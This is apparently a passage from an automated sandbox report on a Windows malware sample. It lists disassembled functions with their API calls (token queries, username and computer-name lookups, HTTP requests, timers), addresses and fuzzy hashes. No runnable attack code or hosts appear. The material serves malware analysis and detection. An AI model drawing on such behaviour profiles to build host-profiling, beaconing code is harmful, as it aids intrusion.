NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BE4279
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 02BE4295

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 02BE42B2
memcpy.NTDLL(?,00000000,0000001C), ref: 02BE42BF
NtClose.NTDLL(?), ref: 02BE42D1
NtClose.NTDLL(00000000), ref: 02BE42DB

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 522e3e0e8b92f26dce7788833ef5c24591b15e4462f12715d539990fada7a700
Instruction ID: 61e15a9f66c1ec56d6e5be49f53bdf7a4dc9034acfba630a837bceb5bc871563
Opcode Fuzzy Hash: 522e3e0e8b92f26dce7788833ef5c24591b15e4462f12715d539990fada7a700
Instruction Fuzzy Hash: 252105B2A10228FBDF019FA5CC84EDEBFBDEB08750F104062F905AA110D7719B549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BE3CE0 Relevance: 21.2, APIs: 14, Instructions: 222
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 02BE3D08
GetTickCount.KERNEL32 ref: 02BE3D1C
HeapFree.KERNEL32(00000000,00000000), ref: 02BE3DF4
HeapFree.KERNEL32(00000000,00000000), ref: 02BE3E26
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BE3E79
GetTickCount.KERNEL32 ref: 02BE3E89
RtlEnterCriticalSection.NTDLL(02BEA38C), ref: 02BE3E9D
RtlLeaveCriticalSection.NTDLL(02BEA38C), ref: 02BE3EBB

Part of subcall function 02BE6675: lstrcat.KERNEL32(00000000,00000000), ref: 02BE66CA
Part of subcall function 02BE6675: StrTrimA.SHLWAPI(00000000,02BE927C,00000000,00000000,02BE3ECE,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE66E7

StrTrimA.SHLWAPI(00000000,02BE9280,00000000,02BEA3CC), ref: 02BE3EED

Part of subcall function 02BE7563: lstrcpy.KERNEL32(00000000,02BEA370), ref: 02BE758F
Part of subcall function 02BE7563: lstrcat.KERNEL32(00000000,?), ref: 02BE759A

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BE3F64

Part of subcall function 02BE21A6: WaitForSingleObject.KERNEL32(00000000), ref: 02BE2258

HeapFree.KERNEL32(00000000,?), ref: 02BE3F54
HeapFree.KERNEL32(00000000,00000000,00000000,02BEA3CC), ref: 02BE3F72
HeapFree.KERNEL32(00000000,?), ref: 02BE3F83
HeapFree.KERNEL32(00000000,00000000), ref: 02BE3F91

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Heap$Free$AllocateCountCriticalSectionTickTrimlstrcat$EnterLeaveObjectSingleWaitlstrcpy
String ID:
API String ID: 1407603502-0
Opcode ID: 82d6cea3519e307efba2fb69c7e3126419daeb6ec8dc71ca88b8d2e47a4a59ea
Instruction ID: 3958bef0cc0a15b9b01afdd2ac806a4e1408cc73b17c10c41705c4e92ded1f29
Opcode Fuzzy Hash: 82d6cea3519e307efba2fb69c7e3126419daeb6ec8dc71ca88b8d2e47a4a59ea
Instruction Fuzzy Hash: 0C71C471840604EFCF21AB69EC88E9B3BFDEF88784B150954F54ADB211D731E928DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02BE7FC5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BE803E
LoadLibraryA.KERNELBASE(?), ref: 02BE80BB
GetLastError.KERNEL32 ref: 02BE80C7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02BE80FA

Strings

$, xrefs: 02BE8013

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 3e29d50d5003f6ea45696422e1954822a2e1be184dcf03249a7fae520bf38ba0
Instruction ID: e90947cc23f34873c5930886f245d60407a1927e21cc9c2af596f56741b92b06
Opcode Fuzzy Hash: 3e29d50d5003f6ea45696422e1954822a2e1be184dcf03249a7fae520bf38ba0
Instruction Fuzzy Hash: EB812971A40A05EFDF20CF98D884BAEB7F5FB48350F148469E906E7251E770EA84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02BE7B83 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,00000008,02BE9050), ref: 02BE7B95

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

InternetCanonicalizeUrlA.WININET(?,00000000,?,00000000), ref: 02BE7BB8
InternetOpenA.WININET(?,00000000,00000000,00000000,10000000), ref: 02BE7BE0
InternetSetStatusCallback.WININET(00000000,02BE7B18), ref: 02BE7BF7
ResetEvent.KERNEL32(?), ref: 02BE7C09
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02BE7C1C
GetLastError.KERNEL32 ref: 02BE7C29
HttpOpenRequestA.WININET(?,?,?,00000000,00000000,00000000,84404000,?), ref: 02BE7C6F
InternetQueryOptionA.WININET(00000000,0000001F,00000000,?), ref: 02BE7C8D
GetLastError.KERNEL32 ref: 02BE7CD4

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

Strings

`, xrefs: 02BE7B8E

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Internet$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpOptionQueryRequestResetStatuslstrlen
String ID: `
API String ID: 2934187762-1850852036
Opcode ID: 43202ab1e14239ddadcff753075065a0b215657122a0d71a565e529a2e35b606
Instruction ID: 945080f75d9b3af922f63d918ffb32367205c2c6c39c445160d4710f38e37a85
Opcode Fuzzy Hash: 43202ab1e14239ddadcff753075065a0b215657122a0d71a565e529a2e35b606
Instruction Fuzzy Hash: C8418E71900604BFEF319FA5DC48E5BBBBDEB85744B104998F603D6190EB30AA55DB21

Uniqueness

Uniqueness Score: -1.00%

Function 02BE6815 Relevance: 12.2, APIs: 8, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 02BE682F
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BE683B
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BE6863
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 02BE6883
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02BE26E9,?,00000000), ref: 02BE6945
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02BE26E9,?,00000000,?,?), ref: 02BE6955
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BE698F

Part of subcall function 02BE5251: StrToIntExW.SHLWAPI(?,00000000,?,?,?,057D5FB8,00000000,?,02BE9038,00000000,02BE905C), ref: 02BE52A0

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,02BE26E9,?,00000000,?,?,?), ref: 02BE69C8

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: TimerWaitable_allmul$CloseCreateErrorFreeHandleHeapLastmemset
String ID:
API String ID: 3728918242-0
Opcode ID: 997ae61dc6951424aed00fa4669c54366c8672f380fbfca7f899e11c2776ff75
Instruction ID: fe95d2ed84a2af3d6320953350e6b0beefe22baa3136622f1e3caf119cb5e603
Opcode Fuzzy Hash: 997ae61dc6951424aed00fa4669c54366c8672f380fbfca7f899e11c2776ff75
Instruction Fuzzy Hash: 6F518B71848320AFCB11EF15CC44DABBBECEB98364F508A1AF9A696290D730D554CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02BE5E40 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BE5E72
GetTokenInformation.KERNELBASE(00000000,00000014,00000001,00000004,?,00000000), ref: 02BE5E92
GetTokenInformation.KERNELBASE(00000000,00000019,00000000,00000000,?), ref: 02BE5EA2
CloseHandle.KERNEL32(00000000), ref: 02BE5EF2

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?,?,?), ref: 02BE5EC5
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BE5ECD
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BE5EDD

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 3dac4e144c1b8eba8aa74b16840443bde2588e1014394bd60f152df5efbd5786
Instruction ID: fba6653fc3be050fd62c26d56ac3a93bd359ce1da13e26eb082401c00c3f41c9
Opcode Fuzzy Hash: 3dac4e144c1b8eba8aa74b16840443bde2588e1014394bd60f152df5efbd5786
Instruction Fuzzy Hash: 97211675900219FFEF11EF94DC84EAEBBBEEB48348F1004A5E911A6191CB719A54EB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BE415A Relevance: 9.1, APIs: 6, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,02BE25B1,?,?,?,?,?), ref: 02BE4166
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BE417C
CreateFileMappingW.KERNELBASE(000000FF,02BEA34C,00000004,00000000,00001000,?,?,54D38000,00000192,?,00000000), ref: 02BE41BD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,?,?,?,?,?,02BE25B1,?,?,?), ref: 02BE41E6
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,02BE25B1,?,?,?,?,?), ref: 02BE4207
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,02BE25B1,?,?,?,?,?), ref: 02BE420F

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView_aulldiv
String ID:
API String ID: 1732207917-0
Opcode ID: 8a242823376e6dc33019d056ea9814c6881197f117dc8595616d0ea2d842cbbc
Instruction ID: 8770ca4322d38c7312541cba04edcf83c84ced7cb72196346573c048c2f13f91
Opcode Fuzzy Hash: 8a242823376e6dc33019d056ea9814c6881197f117dc8595616d0ea2d842cbbc
Instruction Fuzzy Hash: A221A2B2A80604FBDF21EF64CC05F9E7BBAAF84794F110061F506EB291DB709A19CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02BE2523 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BE4520: GetModuleHandleA.KERNEL32(?,00000000,02BE253B), ref: 02BE452F

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02BE25B8

Part of subcall function 02BE27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02BE27C4
Part of subcall function 02BE27A0: wsprintfA.USER32 ref: 02BE2828

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

memset.NTDLL ref: 02BE2612
RtlInitializeCriticalSection.NTDLL(02BEA38C), ref: 02BE2623

Part of subcall function 02BE5C31: memset.NTDLL ref: 02BE5C4B
Part of subcall function 02BE5C31: lstrlenW.KERNEL32(00000000,?,00000005,?,00000000), ref: 02BE5C91
Part of subcall function 02BE5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02BE5C9C

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BE264E
wsprintfA.USER32 ref: 02BE267E

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: 97b5ebcf8980c728fbbe14524b313bf177211ec1897f934442757203e44fa559
Instruction ID: 48014eb4cf8c96ac589eca685d99db2d39bbc9bf11490ea3f65fcdfb57caefaf
Opcode Fuzzy Hash: 97b5ebcf8980c728fbbe14524b313bf177211ec1897f934442757203e44fa559
Instruction Fuzzy Hash: 8351E1B1E80214EFDF20ABA4DD95B6E37ACFB04744F1449D6E903EB241D7749A548F50

Uniqueness

Uniqueness Score: -1.00%

Function 02BE7040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

lstrcpy.KERNEL32(?,00000020), ref: 02BE713D
lstrcat.KERNEL32(?,00000020), ref: 02BE7152
lstrcmpA.KERNEL32(00000000,?), ref: 02BE7169
lstrlen.KERNEL32(?), ref: 02BE718D

Strings

, xrefs: 02BE70D6

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: df7a833d86fd94aa943d821ef3d3fc55496ccbac59e0b4aa1aebe4842ae58598
Instruction ID: f1fa771b0adc2037cc6f9fa32b48fe17baa3314225e8e91053ce2fc7f63422a0
Opcode Fuzzy Hash: df7a833d86fd94aa943d821ef3d3fc55496ccbac59e0b4aa1aebe4842ae58598
Instruction Fuzzy Hash: 07519171A00218EFDF21CF99C484BADFBB6FF45354F1580DAE8169B206CB709A51DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02BE3BD3 Relevance: 6.1, APIs: 4, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02BE3C0A
GetUserNameW.ADVAPI32(00000000,?), ref: 02BE3C2E
HeapFree.KERNEL32(00000000,00000000), ref: 02BE3C4F
HeapFree.KERNEL32(00000000,00000000), ref: 02BE3CB5

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: FreeHeapNameUser
String ID:
API String ID: 97367500-0
Opcode ID: eed903bb6742a4537666086fd40378c85c022c541f0714a58264b2ace7c7f5d2
Instruction ID: d56431fd5c1edb9d3d9651446eeafa1df650185282781e7a8479d4edc11f45fd
Opcode Fuzzy Hash: eed903bb6742a4537666086fd40378c85c022c541f0714a58264b2ace7c7f5d2
Instruction Fuzzy Hash: CE313BB1A00205EFDF10DFA9CD81A6EB7F9FF48340F6188A9E546D7211D730EA549B10

Uniqueness

Uniqueness Score: -1.00%

Function 02BE5364 Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(02BEA38C), ref: 02BE536D
Sleep.KERNEL32(0000000A), ref: 02BE5377
HeapFree.KERNEL32(00000000,00000000), ref: 02BE539F
RtlLeaveCriticalSection.NTDLL(02BEA38C), ref: 02BE53BB

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 9cf3511eb591330e72ec1ae8b98c3c7c7a35fa0403685247c424755cedcd2634
Instruction ID: 50111ee46c04725fdfafa3dd8b91c4441e1d96a27829bf7bee87dc6caf991c5a
Opcode Fuzzy Hash: 9cf3511eb591330e72ec1ae8b98c3c7c7a35fa0403685247c424755cedcd2634
Instruction Fuzzy Hash: FFF0D471A80641EBEF209B69DC48B163BB8AF04385B448944F547DB262D774D868DB25

Uniqueness

Uniqueness Score: -1.00%

Function 02BE5006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,02BE107E,?), ref: 02BE500F
GetTickCount.KERNEL32 ref: 02BE5023

Strings

)dR, xrefs: 02BE502D

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: CountCreateHeapTick
String ID: )dR
API String ID: 2177101570-1277770246
Opcode ID: 9d75122a4f3fb49c3852ee038b645ebedea6b7c78d6e27cf1d771c1fa09b528b
Instruction ID: 1dba973d6300c84050d7bb8d85cfa3760bc403cec6db94ca3fa1689f8b3db662
Opcode Fuzzy Hash: 9d75122a4f3fb49c3852ee038b645ebedea6b7c78d6e27cf1d771c1fa09b528b
Instruction Fuzzy Hash: EEF09230AC0701EAEF722B719D1471536A9EF44789FD088A5F903EA083EBB1D4609F61

Uniqueness

Uniqueness Score: -1.00%

Function 02BE213E Relevance: 4.5, APIs: 3, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SwitchToThread.KERNEL32 ref: 02BE214F
GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 02BE215B

Part of subcall function 02BE6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02BE6308

Sleep.KERNELBASE(00000003,00000000,00000000,?,00000013,00000000), ref: 02BE2193

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThreadmemcpy
String ID:
API String ID: 2829178182-0
Opcode ID: dcdacdf00205426fdf76a3ae7bbab3acdfa102b0189ca542c087646ca5c81874
Instruction ID: 9b4bea2400455820a05ce3c588246c4a2cdfdefc1f972d907b18002560e95a98
Opcode Fuzzy Hash: dcdacdf00205426fdf76a3ae7bbab3acdfa102b0189ca542c087646ca5c81874
Instruction Fuzzy Hash: 2DF0A477B40604BBDB149AA4CC19BDF77BDDB843A1F540564E602E7340E6B49A058A90

Uniqueness

Uniqueness Score: -1.00%

Function 02BE4358 Relevance: 3.1, APIs: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(00000000), ref: 02BE440D
SysFreeString.OLEAUT32(00000000), ref: 02BE441B

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 35953af78fc098884ffcd75d7b6fefbdd58cd1886f103bef68732eda22f49c0a
Instruction ID: aaf1850ac9dc7e9033e4ffba9fca7b2f353159f0df20acee6dea6ab6c60f023f
Opcode Fuzzy Hash: 35953af78fc098884ffcd75d7b6fefbdd58cd1886f103bef68732eda22f49c0a
Instruction Fuzzy Hash: 79311EB5900209EFCF05DF98D4D09AE7BB9FF48344B15846EF9069B251D7309A41CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02BE6675 Relevance: 3.1, APIs: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02BE5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BE668E,?,00000000,00000000,?,02BEA134,02BE3ECE), ref: 02BE587C

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

lstrcat.KERNEL32(00000000,00000000), ref: 02BE66CA

Part of subcall function 02BE5063: lstrlen.KERNEL32(00000000,00000000,02BE3ECE,00000000,?,02BE66D9,00000000,02BE3ECE,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE5074

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

StrTrimA.SHLWAPI(00000000,02BE927C,00000000,00000000,02BE3ECE,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE66E7

Part of subcall function 02BE4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02BE66F3,00000000,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE4AD1
Part of subcall function 02BE4AC7: _snprintf.NTDLL ref: 02BE4B2F

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcat
String ID:
API String ID: 1279665018-0
Opcode ID: 462379dd9c8122c848054c6b28e678e482052df56bf86989977599f7677c00e2
Instruction ID: 1051d658fdc18f8fe1775a72e359e962895e6541423f49d1aae5ff46253ef175
Opcode Fuzzy Hash: 462379dd9c8122c848054c6b28e678e482052df56bf86989977599f7677c00e2
Instruction Fuzzy Hash: 3C117333D01525A78E12BFB89C84C6F37AE9F557683054096F907AB202DF74DD065BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BE51D8 Relevance: 3.0, APIs: 2, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02BE5224

Part of subcall function 02BE2058: lstrlen.KERNEL32(?), ref: 02BE2064
Part of subcall function 02BE2058: memcpy.NTDLL(00000000,?,?,?,00000001,00000001), ref: 02BE20C2
Part of subcall function 02BE2058: lstrcpy.KERNEL32(00000000,?), ref: 02BE20D2

SetEvent.KERNEL32(?), ref: 02BE523D

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: EventHttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 2298518793-0
Opcode ID: dac1c4a4736a3e1387e62262fe6e3546c9823e6188075a2a091ee7d1c233067d
Instruction ID: 1d2685fdd7526a7a7253042a65cfc25a73bec0d284b39b313568f7a1443e1a11
Opcode Fuzzy Hash: dac1c4a4736a3e1387e62262fe6e3546c9823e6188075a2a091ee7d1c233067d
Instruction Fuzzy Hash: 22016D31140601ABDF306A71DC44F5BB7A9FF49369F900A65F592D20E0D720E854DB21

Uniqueness

Uniqueness Score: -1.00%

Function 02C5747B Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C574A3
Module32First.KERNEL32(00000000,00000224), ref: 02C574C3

Memory Dump Source

Source File: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c51000_server.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 42adc56e6d31405a913f3420e0eb53f8ff91d8509618f40e7572037765033383
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E3F096315007316BD7207BF59C8CB6EFAE8BF89624F104528FA4A914C0DB74E9C98E69

Uniqueness

Uniqueness Score: -1.00%

Function 02BE472F Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02BE3DCD,00000000,00000000,?,02BEA134,02BE3DCD), ref: 02BE4747

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

GetComputerNameExA.KERNELBASE(00000003,00000000,02BE3DCD,02BE3DCE,?,02BEA134,02BE3DCD), ref: 02BE4764

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 0643639d4cc81c2773ed98ba8bca5a0371caed731fbb70258fa5447f34cd16ad
Instruction ID: 6598cbc4009e2680faf73df3e1308ff509a0c96f7a8747b783bcb59f212ff260
Opcode Fuzzy Hash: 0643639d4cc81c2773ed98ba8bca5a0371caed731fbb70258fa5447f34cd16ad
Instruction Fuzzy Hash: 60F0B436A00119FAEF11D6AACC05EAF3BFDDBC5645F500195E906D3140EF70DE0186B0

Uniqueness

Uniqueness Score: -1.00%

Function 02BE5251 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,?,057D5FB8,00000000,?,02BE9038,00000000,02BE905C), ref: 02BE52A0

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9379d02299376a9cd949f450ddc1e8baeaa0389f30e445a735db98120b40d567
Instruction ID: 32ae94258445da9e3fbe0e87919e15bbde339206c24622a86101a213933d4141
Opcode Fuzzy Hash: 9379d02299376a9cd949f450ddc1e8baeaa0389f30e445a735db98120b40d567
Instruction Fuzzy Hash: E431AD31900208FFDF21DBA1DC84EAE7BBDFB04748F5640A9E502AB121DB709A54DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BE12C6 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

StrTrimA.KERNELBASE(?,02BE9278,00000001), ref: 02BE1300

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: f73950649e25b8947c1c9200fa4131a858ca0e7a877b0c975c84c3fa5239e602
Instruction ID: 829c20f12fa1c698ffeba08e36c3f86b5d0fdf5157d567e2899d72a8415c2ae5
Opcode Fuzzy Hash: f73950649e25b8947c1c9200fa4131a858ca0e7a877b0c975c84c3fa5239e602
Instruction Fuzzy Hash: 73019A71710346AFEF104A6E8C48FAB7B8DEB85345F648091A95BCB282DB70CC42C660

Uniqueness

Uniqueness Score: -1.00%

Function 02BE2839 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

